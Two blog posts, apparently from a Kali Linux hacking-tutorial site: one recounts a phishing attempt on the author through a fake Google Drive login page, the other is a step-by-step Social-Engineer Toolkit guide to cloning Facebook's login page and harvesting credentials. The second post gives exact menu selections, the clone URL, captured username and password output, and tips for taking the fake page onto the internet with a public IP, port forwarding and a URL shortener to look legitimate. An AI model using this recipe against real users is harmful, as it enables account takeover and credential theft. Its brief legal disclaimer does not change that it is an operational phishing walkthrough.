RN-QQHFzQYtPGkUCfyu8eve2qf0

Friday, 20 June 2014

Real Life Phishing Scenario : Zero Day google bug

Posted by Unknown at 01:22 0 comments

A reader on my blog tried to hack my account

Now all this time I've been teaching people how to hack Wireless networks, Windows machines, Websites and Social Networking accounts. All this we did in Kali Linux. For once, I'm moving away from the operating system and narrating a real life incidence of how someone almost got my Email account and password, and could have possibly infected me with a RAT (remote administration tool). He didn't really mean to hack my account, but was rather interested in making a point. So this is how it happened.



How it started

Everyday, I check my blogger dashboard to see if there are any new comments on my blog. Today morning, I saw an anonymous comment (most of the comments are anonymous so that didn't alarm me) saying that the person needed my help with something but would only contact me via mail. I couldn't give him my personal mail address so I decided to use my website's mail instead, and sent him a message. This was his reply



Looked fair enough. Out of curiosity I clicked the link and it took me to a google drive login page. Everything looked pretty convincing, and I could have easily entered my credentials into the login form, if it were not for the slightly suspicious URL. Also, it was https and chrome verified the digital certificates to be that of google. Faking this can be assumed to be next to be impossible. However, I still was cautious, considering that I run a hacking blog and it's not unlikely that a person visiting here might be good, maybe million times better than me.

What I did

So, I decided, I cannot just dismiss the page as phishing as such without trying. So I entered the email:abcd@gmail.com and password:lookslikephishing and pressed sign in. Now if it were a real page, it would have said incorrect password, but this page had no mechanism for verifying the form data, it actually just kept logging everything (i.e. it recorded whatever someone entered in the form) and would simply download the PDF no matter what we entered in the form. So, after entering the bogus login data, the PDF download started. It completed successfully and I ran the PDF. The content looked genuine and then I realized, well, what if this was a 2 fold attack, first phishing, followed by infection. He could have used a FUD remote administration tool which my antivirus wouldn't be able to detect. I have Windows Defender on my Windows 8 machine, but with proper crypting , anti-viruses can be evaded. So after this, I went to white hat section of hackforums and asked for help (everyone needs help at some time or the other, and I suck at forensics and related stuff) . An expert analyzed my computer thoroughly via teamviewer, and the file was clean indeed. Meanwhile, the following mails had been sent to me.

Mails Recieved


He sent me some mails
He knew I found out the phishing page thing
He said he wants me to spread public awareness regarding this kind of phishing

I replied to him saying that I'm finding out and cleaning the malware he sent me (if any). He replied and said he didn't send any malware or anything.

Finally

 I contacted him via FB. He turned out to be a fellow Indian and was even younger than me (I'm 17 he is 16). By this time I had finished my investigation, and the White hat expert from Hackforums didn't find anything either. I finally concluded that either there is no malware, or he's just too good. Latter is quite unlikely since he was not able to dig up my personal email address on his own. Believe me that's really easy to do. After having a conversation with him and doing some research on this HTTPS phishing page, I realized that it is done using a bug in Google drive, which has been discussed on The Hacker News. I will see if I can replicate a HTTPS phishing website using this bug, and post a tutorial on how to do it. The sole intent of this post is to make people aware that Phishing is a real threat, and to encourage Google to fix this bug soon. Either ways, they will surely patch this bug after I write the tutorial on creating a Phishing page using Google Drive, as Google won't want it's user's accounts to be compromised by any random kid with  a laptop who ended up on this website. Already they have applied a patch which makes carrying this out difficult and during the earlier days of this vulnerability, the URL was short and not suspicious at all, but now it's very long (see the screenshots). Update : Google is probably not going to do anything about the issue as it is not a bug and I'm not gonna take the risk of writing anything which will usher upon me the wrath of Google (as I use blogger for hosting and blogger is owned by google). Google Drive, just like Dropbox allows hosting simple HTML sites like this phishing one. This can be abused, since some people will not know that this is a malicious document uploaded by someone and not a legit Google Drive login page, but it still is not a bug. 
Hacker's message on FB
After I told the hacker on Facebook about this post even he acknowledged that everything about this attack is perfect but the URL which earlier used to start with google drive now has a long suspicious prefix. The vulnerability has been half patched and google will possibly patch the remaining thing soon.
Read full post »
Labels: , , , , , , , ,

Monday, 26 May 2014

Social Engineering Toolkit - Kali : Credential Harvestor : Hack Facebook

Posted by Unknown at 07:26 0 comments

Hacking Facebook

In the previous post I've discussed how not to hack Facebook. Here we will discuss how to hack Facebook. This tutorial is meant for enhancing you networking skills, as well as to develop understanding of how fake web pages are created, so that you can protect yourself from such attacks. Don't use this information to hack someone's account, or you'll run the risk of getting into legal troubles. If you haven't yet read the previous post, you should. It might not be very enlightening in terms of technical details, but it quite enjoyable and will provide you with a background of what we are looking at.

Social Engineering Toolkit

Humans are the weakest link in any security system ~Shashwat (That'll be me)
If you have read the previous post, then you know what I'm talking about. Social engineering toolkit does not exploit vulnerability in the mechanism of any service. It exploits the weakness in the human element of security. Some official words from the official guys before we move on to the actual hacking

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.

Kali Linux

I don't feel the need to mention it, but I'll still do it. You need Kali Linux to proceed with this tutorial. Check out the top of the page and see the "Kali Linux complete" tutorial. Better yet, I'll link it here- Kali Linux : What it is and how to install

Se-toolkit

Start Kali Linux. In a console/terminal type se-toolkit.
Something like this will show up

root@kali:~# se-toolkit
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart

                  _______________________________
                 /   _____/\_   _____/\__    ___/
                 \_____  \  |    __)_   |    |
                 /        \ |        \  |    |
                /_______  //_______  /  |____|
                        \/         \/          
  [---]        The Social-Engineer Toolkit (SET)         [---]      
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]                 Version: 4.3.9                   [---]
  [---]              Codename: 'Turbulence'              [---]
  [---]         Follow us on Twitter: @trustedsec        [---]
  [---]         Follow me on Twitter: @dave_rel1k        [---]
  [---]       Homepage: https://www.trustedsec.com       [---]
     Welcome to the Social-Engineer Toolkit (SET). The one
      stop shop for all of your social-engineering needs.
 
      Join us on irc.freenode.net in channel #setoolkit
  The Social-Engineer Toolkit is a product of TrustedSec.
           Visit: https://www.trustedsec.com
 Select from the menu:
   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About
  99) Exit the Social-Engineer Toolkit
set> 
Now type the following and press enter.
1 [enter] 2 [enter] 3 [enter]

Explanation

  • 1 selects social engineering attacks. Obvious choice if you read the other options from 1 to 9 (and 99 for exit)
  • The 2 selects Website Attack Vectors. Not that obvious.  The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
  • Then, the 3 selects Credential Harvestor.  The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.
Now you'll be seeing something like this-

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.
 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.
 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   1) Web Templates
   2) Site Cloner
   3) Custom Import
  99) Return to Webattack Menu

Type 2 to select site cloner.

Find your IP

On a new terminal type ifconfig. This will give you your ipv4 address, which is what you are looking for


Back to se-toolkit

 Now it'll ask you to specify the IP to which the data is supposed to be sent to. That'll be your IP address. Since this is your internal IP address (i.e. local IP), the fake facebook page will work only for computers connected with your LAN.

Now it'll ask for the page to be cloned. Enter https://www.facebook.com/.

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/

Now in your browser on Kali Linux, enter your IP. It will display facebook login page. Enter any info and press login. You will get the information in se-toolkit. If you are using VMWare or virtualbox, then you can try and enter the IP on the browsers there. It will work.

Live demonstration

To make sure that the demonstration is not just a repetition of what you already know, I have decided to clone the login page of facebook, instead of homepage. It will be a tad bit different. Here is a screenshot of what I did.
The IP address is my internal address from ifconfig, which comes out to be 192.168.154.133. The cloned page is https://www.facebook.com/login.php. Now we will try to see if this credential harvestor works.

On the Kali Linux Machine itself


Entering the IP in browser shows you the fake login page. Also, se-toolkit registers the visit and says 192.168.154.133 - - [27/May/2014 02:32:32] "GET / HTTP/1.1" 200 -
Now if we enter something in the field, it also shows up on se-toolkit. I entered 'hackingwithkalilinux' in username field and 'password' in password field. This is what se-toolkit shows-
POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password
Also note that se-toolkit might keeping dumping more stuff in the console, most of which is not important for the time being.

On Windows 8 machine (host)

Now I'm running Kali on a virtual machine. Windows 8 is the host machine, and we might want to check if it works on Windows 8. Also, we would also like to see if modern browsers are able to observe anything wrong with the page, and if the firewall stops the data flow.
I entered windows8host and password2 and pressed the login button. This is what I got. Also, as I was logged in to Facebook with my personal account, the fake page redirected me to facebook.
POSSIBLE USERNAME FIELD FOUND: email=windows8host
POSSIBLE PASSWORD FIELD FOUND: pass=password2

Conclusion : This method pretty much works well over LAN.

Make it work over internet

To make the technique work over internet, you will need to use your public IP instead of private. Search google for what is my IP to find you public IP. Then use it. You can use tinyurl or something to make the url appear legitimate. Also, port forwarding might need to be enabled, as your router might block traffic on port 80. Firewall can also cause troubles. While this tutorial was nothing more than - se-toolkit 1 2 3 [your IP] [facebook.com], the next post on getting your credential harvestor on the internet will make the tutorial complete and useful in practical sense. Next tutorial will help you make your fake login page accessible over the internet. [Coming Soon] There you go -  http://www.kalitutorials.net/2014/05/credential-harvestor-port-forwarding.html
Read full post »
Labels: , , , , , , , , , , , ,